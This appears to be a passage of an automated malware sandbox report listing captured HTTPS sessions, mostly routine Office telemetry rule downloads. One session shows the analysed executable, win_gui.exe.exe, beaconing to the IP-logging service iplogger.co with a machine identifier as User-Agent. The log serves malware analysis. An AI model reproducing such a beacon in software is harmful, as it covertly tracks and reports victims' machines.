                                x-azure-ref: 20241203T165217Z-174f7845968xlwnmhC1EWR0sv800000016300000000077r6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                137192.168.2.55010513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:17 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: text/xml
                                Content-Length: 1406
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                ETag: "0x8DC582BEB16F27E"
                                x-ms-request-id: b6aee436-d01e-0028-0d5a-437896000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165217Z-174f7845968frfdmhC1EWRxxbw000000165000000000skw6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:17 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                138192.168.2.550107172.67.167.2494431864C:\Users\user\Desktop\win_gui.exe.exe
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC195OUTGET /155qJ4.torrent HTTP/1.1
                                Referer: END
                                User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322
                                Host: iplogger.co
                                Cache-Control: no-cache
                                Cookie: 55593078137264100=3; clhf03028ja=8.46.123.228
                                2024-12-03 16:52:18 UTC1092INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:17 GMT
                                Content-Type: image/png
                                Transfer-Encoding: chunked
                                Connection: close
                                memory: 0.41208648681640625
                                expires: Tue, 03 Dec 2024 16:52:17 +0000
                                Cache-Control: no-store, no-cache, must-revalidate
                                strict-transport-security: max-age=604800
                                strict-transport-security: max-age=31536000
                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                x-frame-options: SAMEORIGIN
                                CF-Cache-Status: BYPASS
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8zxEyyD77T4rpTUdhcw73ovUxlOa4GR7UinVfLN6jclj9akZQt0D090li45nfz5%2F7cDx%2Fm6QOCkzldGotDzMRafhRlqW5sFJBiJIrzUAeqTTRnv%2B3%2BQhHJV%2B%2BRQXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ec510fbca397277-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=43584&min_rtt=19920&rtt_var=23593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=833&delivery_rate=146586&cwnd=225&unsent_bytes=0&cid=26c1293dbf506db2&ts=583&x=0"
                                2024-12-03 16:52:18 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                2024-12-03 16:52:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination Port
                                139192.168.2.55010613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:17 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:18 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:18 GMT
                                Content-Type: text/xml
                                Content-Length: 1369
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                ETag: "0x8DC582BE32FE1A2"
                                x-ms-request-id: 06ed9036-e01e-0071-2c24-4408e7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165218Z-174f78459684bddphC1EWRbht400000015wg00000000n5y4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:18 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                Session IDSource IPSource PortDestination IPDestination Port
                                140192.168.2.55010813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:19 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:19 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1414
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BE03B051D"
                                x-ms-request-id: 252842b6-401e-005b-3ea4-439c0c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968vqt9xhC1EWRgten000000168000000000dvu5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:19 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session IDSource IPSource PortDestination IPDestination Port
                                141192.168.2.55010913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:19 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1377
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                ETag: "0x8DC582BEAFF0125"
                                x-ms-request-id: e94d6c12-a01e-0032-5d08-451949000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968cs2nkhC1EWR2tq000000001xg0000000098ke
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                142192.168.2.55011113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:19 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:19 GMT
                                Content-Type: text/xml
                                Content-Length: 1362
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                ETag: "0x8DC582BE54CA33F"
                                x-ms-request-id: 435fa678-901e-00ac-1f61-43b69e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165219Z-174f7845968jrjrxhC1EWRmmrs000000168g00000000pddb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                Session IDSource IPSource PortDestination IPDestination Port
                                143192.168.2.55011013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:19 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:20 GMT
                                Content-Type: text/xml
                                Content-Length: 1399
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                ETag: "0x8DC582BE0A2434F"
                                x-ms-request-id: f58ffe41-a01e-00ab-56b5-429106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165220Z-174f7845968n2hr8hC1EWR9cag00000015v000000000dxv0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                Session IDSource IPSource PortDestination IPDestination Port
                                144192.168.2.55011213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:20 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:20 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:20 GMT
                                Content-Type: text/xml
                                Content-Length: 1409
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                ETag: "0x8DC582BDFC438CF"
                                x-ms-request-id: 3f20e104-d01e-005a-1934-417fd9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165220Z-174f7845968px8v7hC1EWR08ng00000016dg00000000m8nn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:20 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                Session IDSource IPSource PortDestination IPDestination Port
                                145192.168.2.55011313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:21 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1372
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                ETag: "0x8DC582BE6669CA7"
                                x-ms-request-id: 8189778e-c01e-007a-5562-43b877000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968swgbqhC1EWRmnb4000000169000000000r8x9
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                Session IDSource IPSource PortDestination IPDestination Port
                                146192.168.2.55011413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:21 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1408
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                ETag: "0x8DC582BE1038EF2"
                                x-ms-request-id: c598b7d5-d01e-0014-1559-43ed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968vqt9xhC1EWRgten000000167000000000kxb4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:52:22 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                Session IDSource IPSource PortDestination IPDestination Port
                                147192.168.2.55011513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:52:21 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:52:22 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:52:22 GMT
                                Content-Type: text/xml
                                Content-Length: 1371
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                ETag: "0x8DC582BED3D048D"
                                x-ms-request-id: f55f5888-f01e-0000-046a-40193e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165222Z-174f7845968ljs8phC1EWRe6en000000162000000000d15u
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
